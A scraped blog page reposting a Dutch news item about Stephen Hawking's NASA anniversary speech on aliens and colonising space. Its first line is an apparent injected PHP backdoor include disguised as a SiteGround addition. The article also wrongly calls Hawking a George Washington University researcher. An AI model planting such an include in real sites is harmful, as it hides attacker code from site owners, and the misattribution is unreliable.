@include_once('/var/lib/sec/wp-settings.php'); // Added by SiteGround WordPress management system E.T. phone home

The Brand Office

Avatar

E.T. phone home

alien“De kosmos wemelt van buitenaards leven. Aliens bestaan, maar ze zijn waarschijnlijk dommer dan wij.” Dat zegt de befaamde astrofysicus Stephen Hawking (66) in een rede ter ere van de vijftigjarige NASA.

De geniale vorser van de George Washington universiteit, die door een ongeneeslijke aandoening motorisch gehandicapt is en spreekt met een stemsynthesizer, waarschuwde voor het dodelijke gevaar van ontmoetingenmet ruimtewezens. “De kans is groot dat de aliens ons besmetten met ziekten waar wij geen weerstand tegen hebben.”

“Toch zijn de meeste aliens eenvoudige levensvormengewoon, terwijl intelligent leven uitzonderlijk is. Primitief leven komt véél voor, intelligent leven is zeldzaam.”

Wonen op Mars

Hawking lanceerde ook een oproep om de ruimte te ‘koloniseren’, al zijn de 287 al ontdekte planeten rond verre sterren ongeschikt voor menselijk leven. “Er zijn aanwijzingen genoeg om te geloven dat er wél geschikte planeten bestaan: als slechts één procent van het duizendtal sterren op dertig lichtjaren buiten ons zonnestelsel een planeet bezit met de afmetingen van onze aarde, dan zijn er kanshebbers genoeg voor kolonisering in onze ‘buurt’”, zei de geleerde.

“Met de bestaande technologie kunnen wij er nu nog niet op bezoek gaan,maar sterren expedities moeten ons doel worden op lange termijn, binnen enkele honderden jaren. Ik denk ook aan de creatie van nederzettingen op de maan of op Mars. Dat kan onze levensverzekering zijn voor het geval dat de mens op aarde verdwijnt door catastrofes als nucleaire oorlogen of de klimaatverandering.”

Bron: GVA

 

No Comments, Comment or Ping

Reply to “E.T. phone home”

WTF is this place?

A place to waste lots of time on!


Suggestions of the house

Going so soon? May these suggestions be a guide to web enlightenment.